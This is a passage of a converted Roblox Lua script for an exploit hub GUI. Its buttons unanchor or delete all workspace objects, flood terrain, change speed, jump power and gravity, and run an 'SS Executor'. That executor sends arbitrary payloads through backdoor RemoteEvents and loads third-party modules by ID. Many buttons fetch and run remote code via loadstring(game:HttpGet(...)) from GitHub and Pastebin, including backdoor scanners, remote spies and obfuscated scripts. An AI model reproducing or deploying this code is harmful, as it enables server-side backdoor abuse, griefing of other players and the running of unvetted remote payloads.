			if part:IsA("BasePart") then
				-- Remove existing decals
				for _, child in ipairs(part:GetChildren()) do
					if child:IsA("Decal") then
						child:Destroy()
					end
				end
	
				-- Apply new decal to all faces
				for _, face in ipairs(faces) do
					local decal = Instance.new("Decal")
					decal.Texture = asset
					decal.Face = face
					decal.Parent = part
				end
			end
		end
	end)
end;
task.spawn(C_d);
-- StarterGui.ScreenGui.MainFrame.Page1.LocalScript
local function C_f()
local script = G2L["f"];
	local button = script.Parent
	
	button.MouseButton1Click:Connect(function()
		for _, part in ipairs(workspace:GetDescendants()) do
			if part:IsA("BasePart") then
				part.Anchored = false
			end
		end
	end)
end;
task.spawn(C_f);
-- StarterGui.ScreenGui.MainFrame.Page1.LocalScript
local function C_11()
local script = G2L["11"];
	-- LocalScript inside a TextButton
	
	local button = script.Parent
	local terrain = workspace:FindFirstChildOfClass("Terrain")
	
	button.MouseButton1Click:Connect(function()
		if not terrain then
			warn("Terrain not found.")
			return
		end
	
		local regionSize = Vector3.new(2048, 300, 2048)
		local regionStart = Vector3.new(0, 0, 0)
		local regionEnd = regionStart + regionSize
		local region = Region3.new(regionStart, regionEnd):ExpandToGrid(4)
	
		-- Fill with water (client-side only in FE, global in FD)
		terrain:FillRegion(region, Enum.Material.Water, 4)
	
		-- Optional: simulate swimming for others by forcing Humanoid state
		local player = game.Players.LocalPlayer
		local character = player.Character or player.CharacterAdded:Wait()
		local humanoid = character:FindFirstChildOfClass("Humanoid")
	
		if humanoid then
			humanoid:ChangeState(Enum.HumanoidStateType.Swimming)
		end
	end)
end;
task.spawn(C_11);
-- StarterGui.ScreenGui.MainFrame.Page1.LocalScript
local function C_13()
local script = G2L["13"];
	local button = script.Parent
	
	-- Replace with your desired audio ID
	local soundId = "95156028272944"
	local playbackSpeed = 0.2 -- Adjust this for pitch/speed
	
	button.MouseButton1Click:Connect(function()
		-- Remove any existing sounds named "RitualMusic"
		for _, s in ipairs(workspace:GetChildren()) do
			if s:IsA("Sound") and s.Name == "RitualMusic" then
				s:Destroy()
			end
		end
	
		-- Create new sound
		local sound = Instance.new("Sound")
		sound.Name = "RitualMusic"
		sound.SoundId = "rbxassetid://" .. soundId
		sound.Looped = true
		sound.PlaybackSpeed = playbackSpeed
		sound.Volume = 1
		sound.Parent = workspace
		sound:Play()
	end)
end;
task.spawn(C_13);
-- StarterGui.ScreenGui.MainFrame.Page1.LocalScript
local function C_15()
local script = G2L["15"];
	local button = script.Parent
	
	button.MouseButton1Click:Connect(function()
		for _, obj in ipairs(workspace:GetChildren()) do
			-- Optional: preserve essential services like Terrain or Camera
			if not obj:IsA("Terrain") and not obj:IsA("Camera") then
				obj:Destroy()
			end
		end
	end)
end;
task.spawn(C_15);
-- StarterGui.ScreenGui.MainFrame.Page2.LocalScript
local function C_17()
local script = G2L["17"];
	local button = script.Parent
	
	button.MouseButton1Click:Connect(function()
		--[=[
	 d888b  db    db d888888b      .d888b.      db      db    db  .d8b.  
	88' Y8b 88    88   `88'        VP  `8D      88      88    88 d8' `8b 
	88      88    88    88            odD'      88      88    88 88ooo88 
	88  ooo 88    88    88          .88'        88      88    88 88~~~88 
	88. ~8~ 88b  d88   .88.        j88.         88booo. 88b  d88 88   88    @uniquadev
	 Y888P  ~Y8888P' Y888888P      888888D      Y88888P ~Y8888P' YP   YP  CONVERTER 
	]=]
	
		-- Instances: 13 | Scripts: 3 | Modules: 0 | Tags: 0
		local G2L = {};
	
		-- StarterGui.ScreenGui
		G2L["1"] = Instance.new("ScreenGui", game:GetService("CoreGui"));
		G2L["1"]["ZIndexBehavior"] = Enum.ZIndexBehavior.Sibling;
	
	
		-- StarterGui.ScreenGui.Frame
		G2L["2"] = Instance.new("Frame", G2L["1"]);
		G2L["2"]["BorderSizePixel"] = 0;
		G2L["2"]["BackgroundColor3"] = Color3.fromRGB(0, 42, 204);
		G2L["2"]["Size"] = UDim2.new(0, 312, 0, 337);
		G2L["2"]["Position"] = UDim2.new(0.43507, 0, 0.20477, 0);
		G2L["2"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
	
	
		-- StarterGui.ScreenGui.Frame.LocalScript
		G2L["3"] = Instance.new("LocalScript", G2L["2"]);
	
	
	
		-- StarterGui.ScreenGui.Frame.LocalScript
		G2L["4"] = Instance.new("LocalScript", G2L["2"]);
	
	
	
		-- StarterGui.ScreenGui.Frame.ImageLabel
		G2L["5"] = Instance.new("ImageLabel", G2L["2"]);
		G2L["5"]["BorderSizePixel"] = 0;
		G2L["5"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
		-- [ERROR] cannot convert ImageContent, please report to "https://github.com/uniquadev/GuiToLuaConverter/issues"
		G2L["5"]["Image"] = [[rbxassetid://103157789766561]];
		G2L["5"]["Size"] = UDim2.new(0, 290, 0, 149);
		G2L["5"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
		G2L["5"]["BackgroundTransparency"] = 1;
		G2L["5"]["Position"] = UDim2.new(0.03391, 0, 0.14147, 0);
	
	
		-- StarterGui.ScreenGui.Frame.TextLabel
		G2L["6"] = Instance.new("TextLabel", G2L["2"]);
		G2L["6"]["TextWrapped"] = true;
		G2L["6"]["BorderSizePixel"] = 0;
		G2L["6"]["TextSize"] = 14;
		G2L["6"]["TextScaled"] = true;
		G2L["6"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
		G2L["6"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
		G2L["6"]["TextColor3"] = Color3.fromRGB(0, 0, 0);
		G2L["6"]["BackgroundTransparency"] = 1;
		G2L["6"]["Size"] = UDim2.new(0, 312, 0, 26);
		G2L["6"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
		G2L["6"]["Text"] = [[l0stk1dd88's SS Executor]];
	
	
		-- StarterGui.ScreenGui.Frame.Execute
		G2L["7"] = Instance.new("TextButton", G2L["2"]);
		G2L["7"]["TextWrapped"] = true;
		G2L["7"]["BorderSizePixel"] = 0;
		G2L["7"]["TextSize"] = 14;
		G2L["7"]["TextScaled"] = true;
		G2L["7"]["TextColor3"] = Color3.fromRGB(0, 0, 0);
		G2L["7"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
		G2L["7"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
		G2L["7"]["Size"] = UDim2.new(0, 91, 0, 39);
		G2L["7"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
		G2L["7"]["Text"] = [[Execute]];
		G2L["7"]["Name"] = [[Execute]];
		G2L["7"]["Position"] = UDim2.new(0.03205, 0, 0.60348, 0);
	
	
		-- StarterGui.ScreenGui.Frame.Clear
		G2L["8"] = Instance.new("TextButton", G2L["2"]);
		G2L["8"]["TextWrapped"] = true;
		G2L["8"]["BorderSizePixel"] = 0;
		G2L["8"]["TextSize"] = 14;
		G2L["8"]["TextScaled"] = true;
		G2L["8"]["TextColor3"] = Color3.fromRGB(0, 0, 0);
		G2L["8"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
		G2L["8"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
		G2L["8"]["Size"] = UDim2.new(0, 91, 0, 39);
		G2L["8"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
		G2L["8"]["Text"] = [[Clear]];
		G2L["8"]["Name"] = [[Clear]];
		G2L["8"]["Position"] = UDim2.new(0.35256, 0, 0.60348, 0);
	
	
		-- StarterGui.ScreenGui.Frame.Inject
		G2L["9"] = Instance.new("TextButton", G2L["2"]);
		G2L["9"]["TextWrapped"] = true;
		G2L["9"]["BorderSizePixel"] = 0;
		G2L["9"]["TextSize"] = 14;
		G2L["9"]["TextScaled"] = true;
		G2L["9"]["TextColor3"] = Color3.fromRGB(0, 0, 0);
		G2L["9"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
		G2L["9"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
		G2L["9"]["Size"] = UDim2.new(0, 91, 0, 39);
		G2L["9"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
		G2L["9"]["Text"] = [[Inject]];
		G2L["9"]["Name"] = [[Inject]];
		G2L["9"]["Position"] = UDim2.new(0.66987, 0, 0.60348, 0);
	
	
		-- StarterGui.ScreenGui.Frame.TextBox
		G2L["a"] = Instance.new("TextBox", G2L["2"]);
		G2L["a"]["CursorPosition"] = -1;
		G2L["a"]["PlaceholderColor3"] = Color3.fromRGB(0, 0, 0);
		G2L["a"]["BorderSizePixel"] = 0;
		G2L["a"]["TextWrapped"] = true;
		G2L["a"]["TextSize"] = 14;
		G2L["a"]["TextColor3"] = Color3.fromRGB(0, 0, 0);
		G2L["a"]["TextScaled"] = true;
		G2L["a"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
		G2L["a"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
		G2L["a"]["PlaceholderText"] = [[Enter SS Script or require() here]];
		G2L["a"]["Size"] = UDim2.new(0, 290, 0, 149);
		G2L["a"]["Position"] = UDim2.new(0.03205, 0, 0.1405, 0);
		G2L["a"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
		G2L["a"]["Text"] = [[]];
		G2L["a"]["BackgroundTransparency"] = 1;
	
	
		-- StarterGui.ScreenGui.Frame.polaria
		G2L["b"] = Instance.new("TextButton", G2L["2"]);
		G2L["b"]["TextWrapped"] = true;
		G2L["b"]["BorderSizePixel"] = 0;
		G2L["b"]["TextSize"] = 14;
		G2L["b"]["TextScaled"] = true;
		G2L["b"]["TextColor3"] = Color3.fromRGB(0, 0, 0);
		G2L["b"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
		G2L["b"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
		G2L["b"]["Size"] = UDim2.new(0, 141, 0, 58);
		G2L["b"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
		G2L["b"]["Text"] = [[Polaria]];
		G2L["b"]["Name"] = [[polaria]];
		G2L["b"]["Position"] = UDim2.new(0.03205, 0, 0.75481, 0);
	
	
		-- StarterGui.ScreenGui.Frame.c00lgui
		G2L["c"] = Instance.new("TextButton", G2L["2"]);
		G2L["c"]["TextWrapped"] = true;
		G2L["c"]["BorderSizePixel"] = 0;
		G2L["c"]["TextSize"] = 14;
		G2L["c"]["TextScaled"] = true;
		G2L["c"]["TextColor3"] = Color3.fromRGB(0, 0, 0);
		G2L["c"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
		G2L["c"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
		G2L["c"]["Size"] = UDim2.new(0, 137, 0, 58);
		G2L["c"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
		G2L["c"]["Text"] = [[C00lgui]];
		G2L["c"]["Name"] = [[c00lgui]];
		G2L["c"]["Position"] = UDim2.new(0.52244, 0, 0.75481, 0);
	
	
		-- StarterGui.ScreenGui.Frame.LocalScript
		G2L["d"] = Instance.new("LocalScript", G2L["2"]);
	
	
	
		-- StarterGui.ScreenGui.Frame.LocalScript
		local function C_3()
			local script = G2L["3"];
			local replicatedStorage = game:GetService("ReplicatedStorage")
	
			-- GUI references
			local gui = script.Parent
			local textbox = gui:FindFirstChild("TextBox")
			local executeButton = gui:FindFirstChild("Execute")
			local clearButton = gui:FindFirstChild("Clear")
			local injectButton = gui:FindFirstChild("Inject")
	
			-- Safety check
			if not textbox or not executeButton or not clearButton or not injectButton then
				warn("Missing GUI components.")
				return
			end
	
			-- Execute payload from textbox
			executeButton.MouseButton1Click:Connect(function()
				local payload = textbox.Text
				if payload and payload ~= "" then
					local remote = replicatedStorage:FindFirstChild("Backdoor") or replicatedStorage:FindFirstChild("RemoteEvent") or replicatedStorage:FindFirstChild("RE")
					if remote and remote:IsA("RemoteEvent") then
						remote:FireServer(payload)
					end
				end
			end)
	
			-- Clear textbox
			clearButton.MouseButton1Click:Connect(function()
				textbox.Text = ""
			end)
	
			-- Inject: Loop through all RemoteEvents and test for backdoor execution
			injectButton.MouseButton1Click:Connect(function()
				local testPayload = 'print("Backdoor test from GAMING")'
				local found = false
	
				for _, obj in ipairs(replicatedStorage:GetChildren()) do
					if obj:IsA("RemoteEvent") then
						local success = pcall(function()
							obj:FireServer(testPayload)
						end)
	
						if success then
							found = true
							print("Successfully injected into RemoteEvent! Remote name: " .. obj.Name)
							break -- Stop after first successful injection
						end
					end
				end
	
				if not found then
					print("No active backdoor RemoteEvent found.")
				end
			end)
		end;
		task.spawn(C_3);
		-- StarterGui.ScreenGui.Frame.LocalScript
		local function C_4()
			local script = G2L["4"];
			local frame = script.Parent
			local dragging = false
			local dragInput, mousePos, framePos
	
			frame.InputBegan:Connect(function(input)
				if input.UserInputType == Enum.UserInputType.MouseButton1 then
					dragging = true
					mousePos = input.Position
					framePos = frame.Position
					input.Changed:Connect(function()
						if input.UserInputState == Enum.UserInputState.End then
							dragging = false
						end
					end)
				end
			end)
	
			frame.InputChanged:Connect(function(input)
				if input.UserInputType == Enum.UserInputType.MouseMovement then
					dragInput = input
				end
			end)
	
			game:GetService("UserInputService").InputChanged:Connect(function(input)
				if input == dragInput and dragging then
					local delta = input.Position - mousePos
					frame.Position = UDim2.new(framePos.X.Scale, framePos.X.Offset + delta.X, framePos.Y.Scale, framePos.Y.Offset + delta.Y)
				end
			end)
	
		end;
		task.spawn(C_4);
		-- StarterGui.ScreenGui.Frame.LocalScript
		local function C_d()
			local script = G2L["d"];
			local player = game.Players.LocalPlayer
			local username = player.Name
	
			local gui = script.Parent
			local textbox = gui:FindFirstChild("TextBox")
			local c00lguiButton = gui:FindFirstChild("c00lgui")
			local polariaButton = gui:FindFirstChild("polaria")
	
			-- Replace these with your actual module IDs
			local c00lguiID = 123456789
			local polariaID = 987654321
	
			-- Button: c00lgui
			c00lguiButton.MouseButton1Click:Connect(function()
				if textbox then
					textbox.Text = 'require(14125553864):Fire("' .. username .. '","c00lkidd")'
				end
			end)
	
			-- Button: polaria
			polariaButton.MouseButton1Click:Connect(function()
				if textbox then
					textbox.Text = 'require(' .. 123255432303221 .. '):Pload("' .. username .. '")'
				end
			end)
		end;
		task.spawn(C_d);
	
		return G2L["1"], require;
	end)
end;
task.spawn(C_17);
-- StarterGui.ScreenGui.MainFrame.Page2.LocalScript
local function C_19()
local script = G2L["19"];
	local button = script.Parent
	
	button.MouseButton1Click:Connect(function()
		loadstring(game:HttpGet(('https://raw.githubusercontent.com/EdgeIY/infiniteyield/master/source'),true))()
	end)
end;
task.spawn(C_19);
-- StarterGui.ScreenGui.MainFrame.Page2.LocalScript
local function C_1b()
local script = G2L["1b"];
	local button = script.Parent
	
	button.MouseButton1Click:Connect(function()
		loadstring(game:HttpGet(('https://raw.githubusercontent.com/0Ben1/fe/main/obf_rf6iQURzu1fqrytcnLBAvW34C9N55kS9g9G3CKz086rC47M6632sEd4ZZYB0AYgV.lua.txt'),true))()
	end)
end;
task.spawn(C_1b);
-- StarterGui.ScreenGui.MainFrame.Page2.LocalScript
local function C_1d()
local script = G2L["1d"];
	local button = script.Parent
	
	button.MouseButton1Click:Connect(function()
		loadstring(game:HttpGetAsync("https://raw.githubusercontent.com/78n/SimpleSpy/main/SimpleSpyBeta.lua"))()
	end)
end;
task.spawn(C_1d);
-- StarterGui.ScreenGui.MainFrame.Page2.LocalScript
local function C_1f()
local script = G2L["1f"];
	local button = script.Parent
	
	button.MouseButton1Click:Connect(function()
		loadstring(game:HttpGet("https://raw.githubusercontent.com/its-LALOL/LALOL-Hub/main/Backdoor-Scanner/script"))()
	end)
end;
task.spawn(C_1f);
-- StarterGui.ScreenGui.MainFrame.Page2.LocalScript
local function C_21()
local script = G2L["21"];
	local button = script.Parent
	
	button.MouseButton1Click:Connect(function()
		loadstring(game:HttpGet("https://raw.githubusercontent.com/randomizedcomponent/UC/refs/heads/main/3307468c285f4fe535fb5d87b4b053e6.lua"))()
	end)
end;
task.spawn(C_21);
-- StarterGui.ScreenGui.MainFrame.Page2.LocalScript
local function C_23()
local script = G2L["23"];
	local button = script.Parent
	
	button.MouseButton1Click:Connect(function()
		loadstring(game:HttpGet("https://raw.githubusercontent.com/peyton2465/Dex/master/out.lua"))()
	end)
end;
task.spawn(C_23);
-- StarterGui.ScreenGui.MainFrame.StatSection.SpeedInput.LocalScript
local function C_2a()
local script = G2L["2a"];
	local textBox = script.Parent
	
	textBox:GetPropertyChangedSignal("Text"):Connect(function()
		local filtered = textBox.Text:gsub("[^%d]", "")
		if textBox.Text ~= filtered then
			textBox.Text = filtered
		end
	end)
end;
task.spawn(C_2a);
-- StarterGui.ScreenGui.MainFrame.StatSection.SpeedExecute.LocalScript
local function C_2c()
local script = G2L["2c"];
	local button = script.Parent
	local speedBox = button.Parent:WaitForChild("SpeedInput")
	
	button.MouseButton1Click:Connect(function()
		local speed = tonumber(speedBox.Text)
		if speed and speed > 0 then
			local character = game.Players.LocalPlayer.Character
			if character then
				local humanoid = character:FindFirstChildOfClass("Humanoid")
				if humanoid then
					humanoid.WalkSpeed = speed
				end
			end
		end
	end)
end;
task.spawn(C_2c);
-- StarterGui.ScreenGui.MainFrame.StatSection.JumpPowerExecute.LocalScript
local function C_2e()
local script = G2L["2e"];
	local button = script.Parent
	local frame = button.Parent
	local jumpBox = frame:FindFirstChild("JumpInput")
	
	button.MouseButton1Click:Connect(function()
		local jumpPower = tonumber(jumpBox.Text)
		if not jumpPower or jumpPower <= 0 then
			warn("Invalid JumpPower input")
			return
		end
	
		local player = game:GetService("Players").LocalPlayer
		local function applyJumpPower()
			local character = player.Character
			if character then
				local humanoid = character:FindFirstChildOfClass("Humanoid")
				if humanoid then
					humanoid.UseJumpPower = true --  Important for newer Roblox behavior
					humanoid.JumpPower = jumpPower
					print("JumpPower set to:", jumpPower)
				end
			end
		end
	
		-- If character isn't loaded yet, wait for it
		if not player.Character then
			player.CharacterAdded:Wait()
		end
		applyJumpPower()
	end)
end;
task.spawn(C_2e);
-- StarterGui.ScreenGui.MainFrame.StatSection.JumpInput.LocalScript
local function C_30()
local script = G2L["30"];
	local textBox = script.Parent
	
	textBox:GetPropertyChangedSignal("Text"):Connect(function()
		local filtered = textBox.Text:gsub("[^%d]", "")
		if textBox.Text ~= filtered then
			textBox.Text = filtered
		end
	end)
end;
task.spawn(C_30);
-- StarterGui.ScreenGui.MainFrame.StatSection.GravityInput.LocalScript
local function C_32()
local script = G2L["32"];
	local textBox = script.Parent
	
	textBox:GetPropertyChangedSignal("Text"):Connect(function()
		local filtered = textBox.Text:gsub("[^%d]", "")
		if textBox.Text ~= filtered then
			textBox.Text = filtered
		end
	end)
end;
task.spawn(C_32);
-- StarterGui.ScreenGui.MainFrame.StatSection.GravityExecute.LocalScript
local function C_34()
local script = G2L["34"];
	local button = script.Parent
	local speedBox = button.Parent:WaitForChild("SpeedInput")
	
	button.MouseButton1Click:Connect(function()
		local speed = tonumber(speedBox.Text)
		if speed and speed > 0 then
			local character = game.Players.LocalPlayer.Character
			if character then
				local humanoid = character:FindFirstChildOfClass("Humanoid")
				if humanoid then
					humanoid.WalkSpeed = speed
				end
			end
		end
	end)
end;
task.spawn(C_34);
-- StarterGui.ScreenGui.MainFrame.StatSection.GravityExecute.LocalScript
local function C_35()
local script = G2L["35"];
	local button = script.Parent
	local gravityBox = button.Parent:FindFirstChild("GravityInput")
	
	button.MouseButton1Click:Connect(function()
		local gravity = tonumber(gravityBox.Text)
		if gravity and gravity > 0 then
			game.Workspace.Gravity = gravity
			print("Gravity set to:", gravity)
		else
			warn("Invalid gravity input")
		end
	end)
end;
task.spawn(C_35);
-- StarterGui.ScreenGui.MainFrame.StatSection.MusicInput.LocalScript
local function C_37()
local script = G2L["37"];
	local textBox = script.Parent
	
	textBox:GetPropertyChangedSignal("Text"):Connect(function()
		local filtered = textBox.Text:gsub("[^%d]", "")
		if textBox.Text ~= filtered then
			textBox.Text = filtered
		end
	end)
end;
task.spawn(C_37);
-- StarterGui.ScreenGui.MainFrame.StatSection.ExecuteMusic.LocalScript
local function C_3a()
local script = G2L["3a"];
	local button = script.Parent
	local speedBox = button.Parent:WaitForChild("SpeedInput")
	
	button.MouseButton1Click:Connect(function()
		local speed = tonumber(speedBox.Text)
		if speed and speed > 0 then
			local character = game.Players.LocalPlayer.Character
			if character then
				local humanoid = character:FindFirstChildOfClass("Humanoid")
				if humanoid then
					humanoid.WalkSpeed = speed
				end
			end
		end
	end)
end;
task.spawn(C_3a);
-- StarterGui.ScreenGui.MainFrame.StatSection.ExecuteMusic.LocalScript
local function C_3b()
local script = G2L["3b"];
	local button = script.Parent
	local frame = button.Parent
	local idBox = frame:FindFirstChild("MusicInput")
	local speedBox = frame:FindFirstChild("MusicSpeed")
	
	button.MouseButton1Click:Connect(function()
		local soundId = idBox.Text
		local playbackSpeed = tonumber(speedBox.Text)
	
		if soundId == "" or not playbackSpeed or playbackSpeed <= 0 then
			warn("Invalid input")
			return
		end
	
		-- Remove any existing music
		for _, s in ipairs(workspace:GetChildren()) do
			if s:IsA("Sound") and s.Name == "CustomMusic" then
				s:Destroy()
			end
		end
	
		-- Create new sound
		local sound = Instance.new("Sound")
		sound.Name = "CustomMusic"
		sound.SoundId = "rbxassetid://" .. soundId
		sound.Looped = true
		sound.PlaybackSpeed = playbackSpeed
		sound.Volume = 1
		sound.Parent = workspace
		sound:Play()
	end)
end;
task.spawn(C_3b);
-- StarterGui.ScreenGui.MinimizeFrame.ImageButton.LocalScript
local function C_40()
local script = G2L["40"];
	-- LocalScript inside your toggle button
	
	local button = script.Parent
	local screenGui = button:FindFirstAncestorOfClass("ScreenGui")
	
	local mainFrame = screenGui:FindFirstChild("MainFrame")
	local page2 = screenGui:FindFirstChild("Page2")
	
	if not (mainFrame and page2) then
		warn("MainFrame or Page2 not found in ScreenGui.")
		return
	end
	
	-- Optional: Initial state
	mainFrame.Visible = true
	page2.Visible = false
	
	-- Toggle tracker
	local hideState = false
	
	button.MouseButton1Click:Connect(function()
		hideState = not hideState
	
		if hideState then
			-- First click: hide both
			mainFrame.Visible = false
			page2.Visible = false
		else
			-- Second click: show only MainFrame
			mainFrame.Visible = true
			page2.Visible = false
		end
	end)
end;
task.spawn(C_40);
-- StarterGui.ScreenGui.SwitchFrame.TextButton.LocalScript
local function C_43()
local script = G2L["43"];
	-- LocalScript inside SwitchButton
	
	local button = script.Parent
	local screenGui = button:FindFirstAncestorOfClass("ScreenGui")
	
	local mainFrame = screenGui:FindFirstChild("MainFrame")
	local page2 = screenGui:FindFirstChild("Page2")
	
	if not (mainFrame and page2) then
		warn("MainFrame or Page2 not found.")
		return
	end
	
	-- Optional: Set initial visibility
	mainFrame.Visible = true
	page2.Visible = false
	
	-- Toggle state tracker
	local showingMain = true
	
	button.MouseButton1Click:Connect(function()
		showingMain = not showingMain
	
		mainFrame.Visible = showingMain
		page2.Visible = not showingMain
	end)
end;
task.spawn(C_43);
-- StarterGui.ScreenGui.Page2.TextButton.LocalScript
local function C_4a()
local script = G2L["4a"];
	local button = script.Parent
	
	button.MouseButton1Click:Connect(function()
		--[[
		WARNING: Heads up! This script has not been verified by ScriptBlox. Use at your own risk!
	]]
		loadstring(game:HttpGet('https://raw.githubusercontent.com/FilteringEnabled/NamelessAdmin/main/Source'))()
	end)
end;
task.spawn(C_4a);
-- StarterGui.ScreenGui.Page2.TextButton.LocalScript
local function C_4c()
local script = G2L["4c"];
	local button = script.Parent
	
	button.MouseButton1Click:Connect(function()
		if _G.WRDClickTeleport == nil then
			_G.WRDClickTeleport = true
	
			local player = game:GetService("Players").LocalPlayer
			local UserInputService = game:GetService("UserInputService")
			--Wanted to avoid using mouse instance, but UIS^ is very tedious to get mouse hit position
			local mouse = player:GetMouse()
	
			--Waits until the player's mouse is found
			repeat wait() until mouse
	
			UserInputService.InputBegan:Connect(function(input, gameProcessed)
				if input.UserInputType == Enum.UserInputType.MouseButton1 then
					--Only click teleport if the toggle is enabled
					if _G.WRDClickTeleport and UserInputService:IsKeyDown(Enum.KeyCode.LeftControl) then
						player.Character:MoveTo(Vector3.new(mouse.Hit.x, mouse.Hit.y, mouse.Hit.z)) 
					end
				end
			end)
			--Just toggle instead of re-executing the script
		else
			_G.WRDClickTeleport = not _G.WRDClickTeleport
			--Notify
			if _G.WRDClickTeleport then
				game.StarterGui:SetCore("SendNotification", {Title="WeAreDevs.net"; Text="Click teleport enabled"; Duration=5;})
			else
				game.StarterGui:SetCore("SendNotification", {Title="WeAreDevs.net"; Text="Click teleport disabled"; Duration=5;})
			end
		end
	end)
end;
task.spawn(C_4c);
-- StarterGui.ScreenGui.Page2.TextButton.LocalScript
local function C_4e()
local script = G2L["4e"];
	local button = script.Parent
	
	button.MouseButton1Click:Connect(function()
		--[[
		WARNING: Heads up! This script has not been verified by ScriptBlox. Use at your own risk!
	]]
		loadstring(game:HttpGet("https://raw.githubusercontent.com/iK4oS/backdoor.exe/v8/src/main.lua"))();
	end)
		
	
end;
task.spawn(C_4e);
-- StarterGui.ScreenGui.Page2.TextButton.LocalScript
local function C_50()
local script = G2L["50"];
	local button = script.Parent
	
	button.MouseButton1Click:Connect(function()
		loadstring(game:GetObjects('rbxassetid://2180084478')[1].Source)()
	end)
		
	
end;
task.spawn(C_50);
-- StarterGui.ScreenGui.Page2.TextButton.LocalScript
local function C_53()
local script = G2L["53"];
	local button = script.Parent
	
	button.MouseButton1Click:Connect(function()
		--[[
		WARNING: Heads up! This script has not been verified by ScriptBlox. Use at your own risk!
	]]
		loadstring(game:HttpGet("https://pastebin.com/raw/zqyDSUWX"))()
	end)
		
	
end;
task.spawn(C_53);
-- StarterGui.ScreenGui.Page2.TextButton.LocalScript
local function C_57()
local script = G2L["57"];
	local button = script.Parent
	
	button.MouseButton1Click:Connect(function()
	    --[[
		WARNING: Heads up! This script has not been verified by ScriptBlox. Use at your own risk!
	]]
		loadstring(game:HttpGet("https://raw.githubusercontent.com/JaoExploiter/StellySpyV3/refs/heads/main/StellySpyV3.txt"))()
	end)
end;
task.spawn(C_57);
-- StarterGui.ScreenGui.Page2.TextButton.LocalScript
local function C_59()
local script = G2L["59"];
	local button = script.Parent
	
	button.MouseButton1Click:Connect(function()
		loadstring(game:HttpGet("https://raw.githubusercontent.com/Turtle-Brand/Turtle-Spy/main/source.lua", true))()
	end)
		
	
end;
task.spawn(C_59);
-- StarterGui.ScreenGui.Page2.TextButton.LocalScript
local function C_5b()
local script = G2L["5b"];
	local button = script.Parent
	
	button.MouseButton1Click:Connect(function()
		loadstring(game:HttpGetAsync("https://raw.githubusercontent.com/jLn0n/beckdeer-skenner/main/src/main.lua"))()
	end)
end;
task.spawn(C_5b);
-- StarterGui.ScreenGui.Page2.TextButton.LocalScript
local function C_5d()
local script = G2L["5d"];
	local button = script.Parent
	
	button.MouseButton1Click:Connect(function()
		
	end)
end;
task.spawn(C_5d);
-- StarterGui.ScreenGui.Page2.TextButton.LocalScript
local function C_5f()
local script = G2L["5f"];
	local button = script.Parent
	
	button.MouseButton1Click:Connect(function()
		
	end)
end;
task.spawn(C_5f);
-- StarterGui.ScreenGui.Page2.TextButton.LocalScript
local function C_61()
local script = G2L["61"];
	local button = script.Parent
	
	button.MouseButton1Click:Connect(function()
		
	end)
end;
task.spawn(C_61);
-- StarterGui.ScreenGui.Page2.TextButton.LocalScript
local function C_63()
local script = G2L["63"];
	local button = script.Parent
	
	button.MouseButton1Click:Connect(function()
		
	end)
end;
task.spawn(C_63);
-- StarterGui.ScreenGui.Page2.TextButton.LocalScript
local function C_65()
local script = G2L["65"];
	local button = script.Parent
	
	button.MouseButton1Click:Connect(function()
		
	end)
end;
task.spawn(C_65);
-- StarterGui.ScreenGui.Page2.TextButton.LocalScript
local function C_67()
local script = G2L["67"];
	local button = script.Parent
	
	button.MouseButton1Click:Connect(function()
		
	end)
end;
task.spawn(C_67);
-- StarterGui.ScreenGui.Page2.TextButton.LocalScript
local function C_69()
local script = G2L["69"];
	local button = script.Parent
	
	button.MouseButton1Click:Connect(function()
		
	end)
end;
task.spawn(C_69);
-- StarterGui.ScreenGui.Page2.TextButton.LocalScript
local function C_6b()
local script = G2L["6b"];
	local button = script.Parent
	
	button.MouseButton1Click:Connect(function()
		
	end)
end;
task.spawn(C_6b);
-- StarterGui.ScreenGui.Page2.TextButton.LocalScript
local function C_6d()
local script = G2L["6d"];
	local button = script.Parent
	
	button.MouseButton1Click:Connect(function()
		
	end)
end;
task.spawn(C_6d);
-- StarterGui.ScreenGui.Page2.TextButton.LocalScript
local function C_6f()
local script = G2L["6f"];
	local button = script.Parent
	
	button.MouseButton1Click:Connect(function()
		
	end)
end;
task.spawn(C_6f);
-- StarterGui.ScreenGui.ToggleFrame.TextButton.LocalScript
local function C_72()
local script = G2L["72"];
	-- LocalScript inside StatToggleButton
	
	local button = script.Parent
	local screenGui = button:FindFirstAncestorOfClass("ScreenGui")
	
	-- Locate MainFrame and StatSection inside it
	local mainFrame = screenGui:FindFirstChild("MainFrame")
	local statSection = mainFrame and mainFrame:FindFirstChild("StatSection")
	
	if not (mainFrame and statSection) then
		warn("MainFrame or StatSection not found.")
		return
	end
	
	-- Ensure StatSection starts invisible
	statSection.Visible = false
	
	button.MouseButton1Click:Connect(function()
		statSection.Visible = not statSection.Visible
	end)
end;
task.spawn(C_72);

return G2L["1"], require;
